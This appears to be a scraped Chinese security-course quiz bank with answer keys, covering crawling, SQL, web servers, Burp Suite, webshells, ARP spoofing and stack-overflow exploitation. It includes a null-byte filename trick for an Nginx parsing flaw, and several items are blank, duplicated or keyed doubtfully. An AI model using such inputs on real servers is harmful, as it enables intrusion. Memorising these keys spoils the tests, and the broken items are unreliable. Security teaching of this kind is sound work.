您的答案: 标准答案: D
20、hh.http函数可以添加raw参数来发送原始http数据包这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
21、hackhttp的示例代码code, head, html, redirect_url, log = hh.http(url)中hackhttp源码定义return这五个值的地方没有进行异常处理这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: B
22、queue库中构造函数Queue.LifoQueue实现的队列的进出关系是什么。
A、 先进先出
B、 先进后出
C、 优先级低先出
D、 就不出来
您的答案: 标准答案: B
23、class sb(threading.Thread):创建threading.Thread的父类来包装一个线程对象这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: B
24、代码for i in range(2122, 2127):的循环是用来遍历数字2122-2127这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: A
25、
A、 对
B、 错
您的答案: 标准答案: A
26、re.compile(“lowb”)会将字符串转化为一个什么对象?
A、 StringObject
B、 RegexObject
C、 InterObject
D、 NoneObject
您的答案: 标准答案: B
27、所有场景下使用re.compile预编译正则表达式都可以加快程序运行速度吗?
A、 对
B、 错
您的答案: 标准答案: B
28、视频中通过http响应中的响应实体来判断请求是否成功这个说法是否正确?
A、 对
B、 错
您的答案: 标准答案: A
29、视频中爬去漏洞id的代码是调用bs4进行筛选的这个说法对吗
A、 对
B、 错
您的答案: 标准答案: A
30、视频中是通过遍历页面获取每个漏洞的信息的吗?
A、 对
B、 错
您的答案: 标准答案: A
31、假设爬取poc的过程中响应的Content-Type为application/pdf那么我们可以说爬取成功了吗
A、 对
B、 错
您的答案: 标准答案: B
32、当爬取某一资源必须处在登陆状态时,带上cookie访问是否是一个长久的解决方案?
A、 对
B、 错
您的答案: 标准答案: B
33、Python库requests中requests.get(某url).headers输出的数据的数据类型是什么?
A、 元组
B、 字典
C、 字符串
D、 列表
您的答案: 标准答案: B
34、HTTP中的Keep-Alive是指持久连接吗
A、 对
B、 错
您的答案: 标准答案: A
35、编写Python程序请求网页的时候设置timeout主要是为了防止程序奔溃这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: B
36、代理ip因为经常失效,所以需要维护一个代理ip池定期检查是否失效,这个说法是否正确?
A、 对
B、 错
您的答案: 标准答案: A
37、以下哪项是爬取代理ip中不需要的数据
A、 ip
B、 端口
C、 内存地址
D、 连接类型
您的答案: 标准答案: C
38、Python requests可以用来验证代理吗
A、 对
B、 错
您的答案: 标准答案: A
39、Zoomeye的api 当请求错误时会返回一个json格式的错误响应,下面哪个不是错误响应中json的字段?
A、 error
B、 message
C、 url
D、 userkey
您的答案: 标准答案: D
40、视频代码中使用json.load()的作用在于将字符串类型转化为 Python的字典类型这个说法正确吗?
A、 对
B、 错
您的答案: 标准答案: A
41、数据库管理系统DBMS的全称是什么?
A、 Database Management Software
B、 Database Management System
C、 Director Base Medical Services
D、 Data Being Manipulated Sequentially
您的答案: 标准答案: B
42、数据库(Database)是按照数据结构来组织、存储和管理数据的仓库,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: A
43、关系数据库,是建立在关系模型基础上的数据库,借助于集合代数等数学概念和方法来处理数据库中的数据。这句话对吗?
A、 对
B、 错
您的答案: 标准答案: A
44、在下列关于关系型数据库系统的叙述中,正确的是
A、 表的字段之间和记录之间都不存在联系
B、 表的字段之间不存在联系,而记录之间存在联系
C、 表的字段之间和记录之间都存在联系
D、 表中只有字段之间存在联系
您的答案: 标准答案: C
45、revoke select on admin to bai这个SQL语句是干嘛的?
A、 数据查询DDL
B、 授权DCL
C、 删除记录DML
D、 回滚TCL
您的答案: 标准答案: B
46、SQL的全称是什么?
A、 Structured Question Language
B、 Strong Question Language
C、 Specified Quality Level
D、 Structured Query Language
您的答案: 标准答案: D
47、哪个 SQL 语句用于从数据库中提取数据?
A、 EXTRACT
B、 SELECT
C、 OPEN
D、 GET
您的答案: 标准答案: B
48、DDL(Data Definition Language)数据库操纵语言,用于定义数据库的三级结构,包括外模式、概念模式、内模式及其相互之间的映像,定义数据的完整性、安全控制等约束?
A、 对
B、 错
您的答案: 标准答案: B
49、哪条 SQL 语句用于更新数据库中的数据?
A、 UPDATE
B、 MODIFY
C、 SAVE
D、 SAVE AS
您的答案: 标准答案: A
50、哪条 SQL 语句用于删除数据库中的数据?
A、 COLLAPSE
B、 REMOVE
C、 DELETE
D、 del
您的答案: 标准答案: C
1、MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。这句话对吗?
A、 对
B、 错
您的答案: 标准答案: A
2、网站数据库经常会遭受哪种类型的攻击?
A、 跨站脚本
B、 跨站请求伪造
C、 SQL注入
D、 不安全的直接对象引用
您的答案: 标准答案: C
3、通过 SQL,您如何从 “ichunqiu” 表中选取 “username” 列的值以 “a” 开头的所有记录?
A、 SELECT * FROM ichunqiu WHERE username LIKE ‘a%’
B、 SELECT * FROM ichunqiu WHERE username=‘a’
C、 SELECT * FROM ichunqiu WHERE username LIKE ‘%a’
D、 SELECT * FROM ichunqiu WHERE username=’%a%’
您的答案: 标准答案: A
4、哪个 SQL 关键词用于对结果集进行排序?
A、 ORDER
B、 ORDER BY
C、 SORT
D、 SORT BY
您的答案: 标准答案: B
5、关于HTML5说法正确的是?
A、 HTML5只是对HTML4的一个简单升级
B、 所有主流浏览器都支持HTML5
C、 HTML5新增了离线缓存机制
D、 HTML5主要是针对移动端进行了优化
您的答案: 标准答案: C
6、下列哪一项是CSS正确的语法构成?
A、 body:color=black
B、 {body;color:black}
C、 body {color: black;}
D、 {body:color=black(body}
您的答案: 标准答案: C
7、我们可以在下列哪个 HTML 元素中放置 Javascript 代码?
A、
B、
C、
D、
您的答案: 标准答案: B
8、JavaScript是弱类型语言,不需要用户对变量类型进行明确的定义,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: A
9、定义 JavaScript 数组的正确方法是
A、 var txt = new Array(“George”,“John”,“Thomas”)
B、 var txt = new Array=“George”,“John”,“Thomas”
C、 var txt = new Array:1=(“George”)2=(“John”)3=(“Thomas”)
D、 var txt = new Array(1:“George”,2:“John”,3:“Thomas”)
您的答案: 标准答案: A
10、ActionScript中所有数据都是对象这句话对吗?
A、 对
B、 错
您的答案: 标准答案: A
11、以下函数中,取得给定日期的月份的是什么
A、 day()
B、 month()
C、 year()
D、 weekday()
您的答案: 标准答案: B
12、下面哪种语言不被浏览器执行
A、 ASP
B、 HTML
C、 VBScript
D、 Javascript
您的答案: 标准答案: A
13、ASP.NET中,对于已经生成好的Web Service,在部署和实现该XML Web Service的时候,至少需要的文件有
A、 .asmx文件和.dll文件
B、 .dll文件和.disco文件
C、 AssemblyInfo.cs文件和Web.config文件
D、 AssemblyInfo.cs文件和.asmx文件
您的答案: 标准答案: A
14、ASP.NET中启动页级别的跟踪,可以在@Page指令中设置()参数来实现。
A、 race和TraceRange
B、 Trace和TraceMode
C、 Try和Catch
D、 Try和Finally
您的答案: 标准答案: B
15、ASP.NET程序中,以下()最有利于黑客在Web服务器上对站点文件进行破坏。
A、 Applicaion对象的Lock方法
B、 Server对象的MapPath方法
C、 客户端的JavaScript脚本
D、 页面内的_ViewState控件
您的答案: 标准答案: C
16、下面不属于PHP的标签是
A、 < >
B、 ?>
C、 = ?>
D、
您的答案: 标准答案: A
17、以下关于PHP的描述不正确的是
A、 PHP是一种弱类型、解释型语言
B、 PHP与C、JAVA等面向对象一样,需要明确指定变量类型
C、 PHP可以与MySQL进行交互,创建动态Web站点
D、 PHP是PHP:Hypertext Preprocessor的递归缩写
您的答案: 标准答案: B
18、下面哪个是JSP中最基本的对象,它是用户与服务器进行交互的基础。
A、 Response对象
B、 Application对象
C、 Request对象
D、 Session对象
您的答案: 标准答案: C
19、在JSP程序中只有3种编译指令,分别是加载指令、标记数据库指令和什么指令
A、 描述指令
B、 网页指令
C、 取代指令
D、 释放指令
您的答案: 标准答案: B
20、Page指令中的“contenType”属性是用于指出什么类型
A、 服务器类型
B、 用户类型
C、 数据库类型
D、 网页类型
您的答案: 标准答案: D
21、在请求头中Connection表示什么
A、 表示客户端与服务连接类型
B、 表示浏览器有能力解码的编码类型
C、 表示浏览器支持的 MIME 类型
D、 表示客户端与服务连接类型
您的答案: 标准答案: D
22、burpsuite不可以抓到HTTPS的内容这句话对吗
A、 对
B、 错
您的答案: 标准答案: B
23、使用burpsuite爆破时在哪里设置Payload type为Numbers?
A、 Repeater下的payloads
B、 Intruder下的Payloads
C、 Proxy下的payloads
D、 Intruder下Target
您的答案: 标准答案: B
24、Webshell的功能不能实现读取注册表,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: B
25、这句webshell通过下面什么方式来执行的呢?
A、 参数HTTP_USER_AGENT
B、 HTTP请求头HTTP_USER_AGENT
C、 参数$_SERVER[‘HTTP_USER_AGENT’]
D、 参数system
您的答案: 标准答案: B
26、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?
A、 不相等
B、 相等
C、 不能用全等于来判断
D、 以上说法都不正确
您的答案: 标准答案: A
27、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?
A、 xxx.asp;.jpg
B、 /xxx.asp/xxx.jpg
C、 /xxx.cer
D、 xxx.jpg%00.php
您的答案: 标准答案: D
28、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?
A、 对
B、 错
您的答案: 标准答案: B
29、在iconv转码的过程中,utf转为gb2312会出现什么问题?
A、 字符串变成ASCII码了
B、 字符串为空了
C、 字符串变乱码了
D、 字符串被截断
您的答案: 标准答案: D
30、AngularJS是什么?
A、 Web应用
B、 Web前端框架
C、 Web服务端语言
D、 数据库
您的答案: 标准答案: B
31、Node.js能通过JavaScript语言开发web服务端吗?
A、 对
B、 错
您的答案: 标准答案: A
32、刷新和转到谁会更新本地的缓存?
A、 刷新
B、 转到
C、 刷新和转到都会更新
D、 刷新和转到都不会更新
您的答案: 标准答案: A
33、WWW的全称是什么?
A、 Wiki Wiki Web
B、 World Wide Web
C、 World Weather Watch
D、 Whole Wide World
您的答案: 标准答案: B
34、Bootstrap是哪个公司推出的前端开发开源工具包?
A、 Google
B、 Facebook
C、 Twitter
D、 Microsoft
您的答案: 标准答案: C
35、CMS是Content Management System的缩写?
A、 对
B、 错
您的答案: 标准答案: A
36、Django是什么语言编写的Web框架?
A、 PHP
B、 JavaScript
C、 Python
D、 Java
您的答案: 标准答案: C
37、下面关于ASP的表述中正确的是?
A、 ASP只能用写字板打开编辑
B、 ASP是一套客户端脚本运行环境
C、 ASP程序可以包含纯文字、HTML标记以及脚本语言
D、 ASP是一种跨平台的服务器的嵌入式脚本语言
您的答案: 标准答案: C
38、IIS的全称是什么?
A、 Internet Information System
B、 Industry Information Security
C、 Immunization Information Systems
D、 Internet Information Services
您的答案: 标准答案: D
39、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?
A、 同一应用中的多个程序共享一个数据集合
B、 多个用户共享一个数据文件
C、 多个用户、同一种语言共享数据
D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合
您的答案: 标准答案: D
40、Cookie在本地会有存储,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: A
41、Windows是美国哪个公司研发的一套操作系统?
A、 Yahoo!
B、 Google
C、 iTunes
D、 Microsoft
您的答案: 标准答案: D
42、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: B
43、HTTP协议对事物处理有记忆能力,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: B
44、TCP/IP是哪个层的协议
A、 表示层
B、 会话层
C、 应用层
D、 传输层
您的答案: 标准答案: C
45、以下哪些层是属于TCP/IP参考模型
A、 应用层
B、 传输层
C、 互联网层
D、 网络访问层
您的答案: 标准答案:
46、服务器错误服务不可用返回的数字是什么
A、 200
B、 403
C、 503
D、 502
您的答案: 标准答案: C
47、下面那个是不属于HTTP报头
A、 普通报头
B、 正文报头
C、 请求报头
D、 响应报头
您的答案: 标准答案: B
48、返回的状态码是200代表着什么
A、 客户端请求有语法错误,不能被服务器所理解
B、 服务器收到请求,但是拒绝提供服务。
C、 服务器发生不可预期的错误。
D、 客户端请求成功
您的答案: 标准答案: D
49、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。
A、 对
B、 错
您的答案: 标准答案: A
50、SQLI-LABS是一个什么漏洞练习平台
A、 SQL Injection
B、 XSS
C、 CSRF
D、 命令执行
您的答案: 标准答案: A
1、burpsuite不可以抓到HTTPS的内容这句话对吗
A、 对
B、 错
您的答案: 标准答案: B
2、使用burpsuite爆破时在哪里设置Payload type为Numbers?
A、 Repeater下的payloads
B、 Intruder下的Payloads
C、 Proxy下的payloads
D、 Intruder下Target
您的答案: 标准答案: B
3、Webshell的功能不能实现读取注册表,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: B
4、这句webshell通过下面什么方式来执行的呢?
A、 参数HTTP_USER_AGENT
B、 HTTP请求头HTTP_USER_AGENT
C、 参数$_SERVER[‘HTTP_USER_AGENT’]
D、 参数system
您的答案: 标准答案: B
5、在php中使用全等于来判断大写的PHP和小写的php是否相等,以下说法正确的是?
A、 不相等
B、 相等
C、 不能用全等于来判断
D、 以上说法都不正确
您的答案: 标准答案: A
6、Nginx <8.03 空字节代码执行漏洞我们通过访问下面什么文件名来执行?
A、 xxx.asp;.jpg
B、 /xxx.asp/xxx.jpg
C、 /xxx.cer
D、 xxx.jpg%00.php
您的答案: 标准答案: D
7、在IIS7.0/IIS 7.5/Nginx < 0.8.3畸形解析漏洞中,默认Fast-CGI是不开启的,这句话正确吗?
A、 对
B、 错
您的答案: 标准答案: B
8、在iconv转码的过程中,utf转为gb2312会出现什么问题?
A、 字符串变成ASCII码了
B、 字符串为空了
C、 字符串变乱码了
D、 字符串被截断
您的答案: 标准答案: D
9、AngularJS是什么?
A、 Web应用
B、 Web前端框架
C、 Web服务端语言
D、 数据库
您的答案: 标准答案: B
10、Node.js能通过JavaScript语言开发web服务端吗?
A、 对
B、 错
您的答案: 标准答案: A
11、刷新和转到谁会更新本地的缓存?
A、 刷新
B、 转到
C、 刷新和转到都会更新
D、 刷新和转到都不会更新
您的答案: 标准答案: A
12、WWW的全称是什么?
A、 Wiki Wiki Web
B、 World Wide Web
C、 World Weather Watch
D、 Whole Wide World
您的答案: 标准答案: B
13、Bootstrap是哪个公司推出的前端开发开源工具包?
A、 Google
B、 Facebook
C、 Twitter
D、 Microsoft
您的答案: 标准答案: C
14、CMS是Content Management System的缩写?
A、 对
B、 错
您的答案: 标准答案: A
15、Django是什么语言编写的Web框架?
A、 PHP
B、 JavaScript
C、 Python
D、 Java
您的答案: 标准答案: C
16、下面关于ASP的表述中正确的是?
A、 ASP只能用写字板打开编辑
B、 ASP是一套客户端脚本运行环境
C、 ASP程序可以包含纯文字、HTML标记以及脚本语言
D、 ASP是一种跨平台的服务器的嵌入式脚本语言
您的答案: 标准答案: C
17、IIS的全称是什么?
A、 Internet Information System
B、 Industry Information Security
C、 Immunization Information Systems
D、 Internet Information Services
您的答案: 标准答案: D
18、数据库的特点之一是数据共享,严格地讲,这里的数据共享指的是什么?
A、 同一应用中的多个程序共享一个数据集合
B、 多个用户共享一个数据文件
C、 多个用户、同一种语言共享数据
D、 多种应用、多种语言、多个用户相互覆盖地使用数据集合
您的答案: 标准答案: D
19、Cookie在本地会有存储,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: A
20、Windows是美国哪个公司研发的一套操作系统?
A、 Yahoo!
B、 Google
C、 iTunes
D、 Microsoft
您的答案: 标准答案: D
21、Google Chrome浏览器不可以在Linux操作系统下使用,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: B
22、HTTP协议对事物处理有记忆能力,这句话对吗?
A、 对
B、 错
您的答案: 标准答案: B
23、TCP/IP是哪个层的协议
A、 表示层
B、 会话层
C、 应用层
D、 传输层
您的答案: 标准答案: C
24、以下哪些层是属于TCP/IP参考模型
A、 应用层
B、 传输层
C、 互联网层
D、 网络访问层
您的答案: 标准答案:
25、服务器错误服务不可用返回的数字是什么
A、 200
B、 403
C、 503
D、 502
您的答案: 标准答案: C
26、下面那个是不属于HTTP报头
A、 普通报头
B、 正文报头
C、 请求报头
D、 响应报头
您的答案: 标准答案: B
27、返回的状态码是200代表着什么
A、 客户端请求有语法错误,不能被服务器所理解
B、 服务器收到请求,但是拒绝提供服务。
C、 服务器发生不可预期的错误。
D、 客户端请求成功
您的答案: 标准答案: D
28、HTTP POST DOS拒绝服务攻击原理是在发送HTTP POST包时,指定一个非常大的Content-Length值,然后以很低的速度发包,比如10~100s发一个字节,保持住这个连接不断开。这样当客户端连接数多了以后,占用住了Web Server的所有可用连接,从而导致DOS。
A、 对
B、 错
您的答案: 标准答案: A
29、SQLI-LABS是一个什么漏洞练习平台
A、 SQL Injection
B、 XSS
C、 CSRF
D、 命令执行
您的答案: 标准答案: A
30、Linux中提供了很多的网卡配置工具,下面哪个不属于Linux中配置网络的命令?
A、 netconfig
B、 prtconf
C、 ifconfig
D、 linuxconfig
您的答案: 标准答案: B
31、下面哪个参数可以让nmap不检测主机存活
A、 -sL
B、 -sn
C、 -Pn
D、 -PS
您的答案: 标准答案: C
32、在Metasploit中,我们使用什么命令加载第三方模块,如Nmap
A、 exploit_nmap
B、 show_nmap
C、 db_nmap
D、 run_nmap
您的答案: 标准答案: C
33、parallels desktop是哪个平台下的虚拟机软件
A、 Windows
B、 Android
C、 Mac OS
D、 Linux
您的答案: 标准答案: C
34、Kali Linux 前身是什么?
A、 NodeZero
B、 BackTrack
C、 Matriux
D、 Anonymous-OS
您的答案: 标准答案: B
35、在使用Python的Socket模块编程的时候,使用下面哪个方法来绑定本地地址
A、 accept
B、 send
C、 bind
D、 listen
您的答案: 标准答案: C
36、在使用Python的Socket模块编程的时候,使用下面哪个方法来发送消息
A、 accept
B、 send
C、 recv
D、 listen
您的答案: 标准答案: B
37、视频中实现的程序无法切换目录,在Python的OS模块中什么函数可以改变当前路径到指定路径
A、 os.remove()
B、 os.chdir()
C、 os.listdir()
D、 os.mkdir()
您的答案: 标准答案: B
38、Python中可以使用什么库来实现多线程
A、 OS
B、 Threading
C、 Time
D、 Socket
您的答案: 标准答案: B
39、在Python中,我们实例化一个Thread对象后,通过什么方法来运行
A、 start()
B、 enumerate()
C、 Thread()
D、 setDaemon()
您的答案: 标准答案: A
40、Python中我们使用try-except语句是为了保证用户是按软件使用要求传入三个参数,这句话对吗
A、 对
B、 错
您的答案: 标准答案: A
41、Python中SocketServer库中handle()函数有什么用?
A、 准备请求处理. 默认什么都不做
B、 处理请求,解析传入的请求,处理数据,并发送响应。默认什么都不做
C、 环境清理。默认什么都不做
D、 通过服务器的构造函数来激活服务器。默认的行为只是监听服务器套接字。可重载。
您的答案: 标准答案: B
42、以下有关代理服务器说法中不正确的是()
A、 为工作站提供访问Internet的代理服务
B、 代理服务器可用作防火墙
C、 使用代理服务器可提高Internet的浏览速度
D、 代理服务器是一种硬件技术,是建立在浏览器与Web服务器之间的服务器
您的答案: 标准答案: D
43、IMAP协议的端口号是多少
A、 80
B、 21
C、 143
D、 25
您的答案: 标准答案: C
44、使用Python编写抓包工具时,利用Python模块scapy中什么方法开始抓包?
A、 arp
B、 ether
C、 sniff
D、 sendp
您的答案: 标准答案: C
45、以下关于ARP欺骗的描述错误的是
A、 ARP欺骗可冒充网关欺骗主机
B、 ARP欺骗可冒充主机欺骗网关
C、 ARP欺骗可冒充主机欺骗其它主机
D、 在主机上静态绑定网关的MAC地址可防止所有ARP欺骗
您的答案: 标准答案: D
46、关于ARP表,以下描述中正确的是
A、 用于建立IP地址到MAC地址的映射
B、 提供常用目标地址的快捷方式来减少网络流量
C、 用于进行应用层信息的转换
D、 用于在各个子网之间进行路由选择
您的答案: 标准答案: A
47、下列关于ARP协议正确的是
A、 全称地址解析协议,通过ARP可以将IP地址解析为MAC地址。
B、 可以实现MAC地址到IP地址的转换。
C、 ARP病毒主要是利用IP地址可以随意更改来实现的。
D、 以上都正确
您的答案: 标准答案: A
48、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
49、在wireshark所抓数据包分析里,SYN响应包是ACK
A、 对
B、 错
您的答案: 标准答案: B
50、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗
A、 对
B、 错
您的答案: 标准答案: A
1、下列对于ESP与EBP寄存器的描述错误的是?
A、 EBP在栈空的时候指向的是栈底,ESP指向的是栈底的下一个位置
B、 当参数入栈时,ESP指向的栈地址会向上移动
C、 当有参数入栈时,EBP指向的栈地址会向下移动
D、 EBP标识了当前栈帧的底部,ESP标识了当前栈帧的顶部
您的答案: 标准答案: C
2、下列对于栈溢出漏洞原理的描述错误的是哪条?
A、 可以造成命令执行漏洞
B、 栈溢出漏洞是缓冲区溢出漏洞的一种
C、 由于软件开发人员没有考虑周全造成的漏洞
D、 操作系统的内存管理机制的漏洞
您的答案: 标准答案: D
3、下列对软件壳保护技术描述错误的是?
A、 利用特殊的算法,对EXE、DLL文件里的资源进行压缩、加密
B、 附加在源程序之上,被加载执行的
C、 一般情况下,壳程序在源程序执行之前执行
D、 程序加壳保护,就不会存在源码泄露的风险
您的答案: 标准答案: D
4、下列对虚拟机保护壳描述错误的是?
A、 需要将代码翻译为机器和人都无法识别的一串伪代码字节流
B、 虚拟机就是将无法识别的伪代码字节流翻译为原始代码的一段程序
C、 就是程序在执行时创建一个虚拟机来执行程序,与主机隔离,防止源码外泄
D、 程序在执行时,先执行虚拟机程序将无法识别的伪代码逐步翻译
您的答案: 标准答案: C
5、下列关于缓冲区溢出的描述错误的是?
A、 计算机向缓冲区内填充数据位数超过了缓冲区本身的容量
B、 利用缓冲区溢出攻击,可以导致程序运行失败、系统关机、重启等
C、 缓冲区溢出是操作系统的内存管理机制的缺陷
D、 缓冲区溢出中,最为危险的是堆栈溢出
您的答案: 标准答案: C
6、在创建新的栈帧时EBP与ESP分别执行____操作。
A、 add esp,n;pop ebp;ret;
B、 push ebp;move ebp,esp;sub esp,n;
C、 move ebp;push ebp;pop;
D、 push esp;move esp;ret;
您的答案: 标准答案: B
7、下列关于栈描述错误的是?
A、 用于线性存储数据的内存
B、 具有先进后出的特点
C、 只能在一端对数据进行插入和删除
D、 使用的是二级缓存
您的答案: 标准答案: D
8、常见病毒程序中Overlay的起点位于区段表中哪个位置?
A、 倒数第二个区块末尾
B、 第一个区块开头
C、 最后一个区块末尾
D、 第一个区块末尾
您的答案: 标准答案: C
9、下列哪种方式不是病毒一般进行静态分析所采用的方式?
A、 查找字符串
B、 侦壳操作
C、 行为监控
D、 PE分析
您的答案: 标准答案: C
10、下面关于UPX的描述错误的是____。
A、 是一款可执行文件压缩器
B、 upx -9 表示最强程度压缩命令
C、 upx压缩后的文件需要解压后才能执行
D、 upx -d 为解压命令
您的答案: 标准答案: C
11、下面关于VMProtect的描述错误的是____。
A、 VMProtect是一个解释执行引擎
B、 在function层面X86代码和VMProtect不是一一对应的
C、 其本质是一个堆栈机
D、 通过NOR和ADD来实现X86指令的等价运算
您的答案: 标准答案: B
12、下面关于UPX的描述错误的是____。
A、 是一款可执行文件压缩器
B、 upx -9 表示最强程度压缩命令
C、 upx压缩后的文件需要解压后才能执行
D、 upx -d 为解压命令
您的答案: 标准答案: C
13、下面关于VMProtect的描述错误的是____。
A、 VMProtect是一个解释执行引擎
B、 在function层面X86代码和VMProtect不是一一对应的
C、 其本质是一个堆栈机
D、 通过NOR和ADD来实现X86指令的等价运算
您的答案: 标准答案: B
14、下列不属于脚本病毒的特点是:
A、 隐蔽性强
B、 传播性强
C、 爆发性
D、 自我消失性
您的答案: 标准答案: D
15、下列软件中不属于木马文件的是:
A、 PCshare
B、 njRAT
C、 KilerRat
D、 PCHunter
您的答案: 标准答案: D
16、直接通过文件后缀名判断该文件是否具有危害性:
A、 对
B、 错
您的答案: 标准答案: B
17、能够隐藏任务栏图标的软件是:
A、 HideTools
B、 PCHunter
C、 火绒剑
D、 冰刃
您的答案: 标准答案: A
18、下列哪个键值是修改文件关联方式的关键值:
A、 HKEY_CLASS_ROOT\txtfile\shell\open\command
B、 HKEY_CURRENT_USER\txtfile\shell\open\command
C、 HKEY_CLASS_ROOT\txtfile\shell\class\command
D、 HKEY_CURRENT_USER\txtfile\shell\class\command
您的答案: 标准答案: A
19、下列不属于本地安全策略中密码策略的是:
A、 密码必须符合复杂性要求
B、 密码长度最小值
C、 密码最长使用期限
D、 密码长度最大值
您的答案: 标准答案: D
20、开启密码必须符合复杂性要求策略后,下列哪个命令能够成功执行:
A、 net user test 123123 /add
B、 net user test 12312a /add
C、 net user test 123ads /add
D、 net user test 123!adss!! /add
您的答案: 标准答案: D
21、用户登录失败的记录可以通过事件管理器来查看
A、 对
B、 错
您的答案: 标准答案: A
22、用户不可以利用本地安全策略来实现:
A、 编辑计算机上的帐号策略和本地策略
B、 控制访问计算机的用户
C、 启用或禁用开始菜单内的功能选项
D、 修改计算机用户名密码
您的答案: 标准答案: D
23、配置组策略的主要目的是提高计算机安全性
A、 对
B、 错
您的答案: 标准答案: A
24、当计算器网络环境处在域环境中,应当配置哪个防火墙配置文件:
A、 专用配置文件
B、 域配置文件
C、 共用配置文件
D、 局域网配置文件
您的答案: 标准答案: B
25、如何配置远程桌面禁止访问:
A、 在入站规则处将远程桌面已启用选项关闭
B、 在出站规则处将远程桌面已启用选项打开
C、 在入站规则处将远程桌面已启用选项打开
D、 在出站规则处将远程桌面已启用选项关闭
您的答案: 标准答案: A
26、只允许本机访问其他机器的80端口,下面配置正确的是:
A、 在入站规则处新建规则,指定特定端口为80,协议为tcp的流量通行
B、 在出站规则处新建规则,指定特定端口为135,协议为tcp的流量通行
C、 在入站规则处新建规则,指定特定端口为135,协议为tcp的流量通行
D、 在出站规则处新建规则,指定特定端口为80,协议为tcp的流量通行
您的答案: 标准答案: D
27、禁用Windows firewall服务后,windows防火墙能够正常使用
A、 对
B、 错
您的答案: 标准答案: B
28、IPSec通过什么安全性来提供主动的保护以防止专用网络与Internet的攻击
A、 点对点
B、 端对端
C、 点对端
D、 端对点
您的答案: 标准答案: B
29、对于隧道模式说法正确的是:
A、 只对ip有效数据载荷进行封装和加密
B、 安全程度较低
C、 IP源和目标ip地址不加密传送
D、 从外部看不到数据包的路由过程
您的答案: 标准答案: D
30、下列选项中,不属于IPSec的优点是:
A、 除TCP/IP协议之外,不支持其他协议
B、 保护ip数据包的内容
C、 为IPV4和IPV6提供互操作能力
D、 保护ip数据包的内容
您的答案: 标准答案: A
31、新建一个IPSec策略,将源地址为任意地址的icmp协议包禁用,其他人使用ping命令探测本机,无法ping通
A、 对
B、 错
您的答案: 标准答案: A
32、下列属于系统克隆工具的是:
A、 TrueCrypt
B、 javaexec
C、 wce
D、 Ghost
您的答案: 标准答案: D
33、使用Ghost备份系统的步骤,Local->Partition->ToImage.开始备份系统
A、 对
B、 错
您的答案: 标准答案: A
34、对于栈是什么,下面说法正确的是():
A、 用于线性存储数据的内存,数据可以是函数的全局变量
B、 用于线性存储数据的内存,数据可以是函数的全局变量
C、 具有先出后进的特点
D、 与栈有关的操作:push入栈,pop出栈,mov数据传递指令
您的答案: 标准答案: D
35、函数栈帧之间对比错误的是():
A、 ESP内存空间为当前函数的栈帧
B、 EBP标识了当前栈帧的底部
C、 ESP标识了当前栈帧的底部,EBP标识了后面栈帧的顶部
D、 ESP与EBP之间的内存空间为当前函数的栈帧
您的答案: 标准答案: C
36、每个函数都有自己的栈帧,每个函数都是利用自己的栈帧空间保存全局变量与函数的调用关系。()
A、 对
B、 错
您的答案: 标准答案: B
37、如果能控制进程的执行流程,不能够执行想要执行的指令,达到我们目的的指令序列就叫做shellcode。()
A、 对
B、 错
您的答案: 标准答案: B
38、下面是漏洞代码,分析的结果:创建一个ba数组,将ba内容加密,修改ba内容,为ba解密。()
A、 对
B、 错
您的答案: 标准答案: B
39、Flash的JIT并没有检查CFG合法性?()
A、 对
B、 错
您的答案: 标准答案: A
40、漏洞分析有三大分类,正确一项是():
A、 利用位置,威胁类型,技术类型
B、 本地类型
C、 获取服务类型
D、 内存破坏类:动态数据区溢出
您的答案: 标准答案: A
41、构造数据通过程序不断的转播处理,改变了程序执行流程,造成数据被当作代码执行。()
A、 对
B、 错
您的答案: 标准答案: A
42、下面代码不存在溢出漏洞():
A、 对
B、 错
您的答案: 标准答案: B
43、当打开一个漏洞样本的时候,这个样本执行了test.tmp的exe,这个test.tmp还把IE执行起来了。在整个过程当中,那个API函数不可以运行可执行文件():
A、 ShellExecute
B、 Dumpbin
C、 CreateProcess
D、 WinExec
您的答案: 标准答案: B
44、一个PE文件装载进内存里,用OD调式器解释,可以看到有EIP指针,ESP当前函数栈帧,EBP函数栈帧,数据区(全局变量)。()
A、 对
B、 错
您的答案: 标准答案: A
45、堆栈溢出指的是堆溢出。()
A、 对
B、 错
您的答案: 标准答案: B
46、OLE对象包含内容的是():
A、 TXT纯文字文档
B、 PDF、Office、Flash格式文档
C、 EXE格式文档
D、 RAR格式文档
您的答案: 标准答案: B
47、OLE创建包含不同来源的复合文档和应用程序,不同类型的数据,但不能把文字、声音、表格、应用程序组合。()
A、 对
B、 错
您的答案: 标准答案: B
48、栈溢出后,如何利用漏洞?():
A、 少字节可编辑,EBP覆盖,文件格式系统嵌入,Shellcode后台执行,正常保存打开
B、 少字节可编辑,正常保存打开
C、 EBP覆盖,正常保存打开
D、 文件格式系统嵌入,正常保存打开
您的答案: 标准答案: A
49、如何做到栈溢出漏洞利用的技巧?():
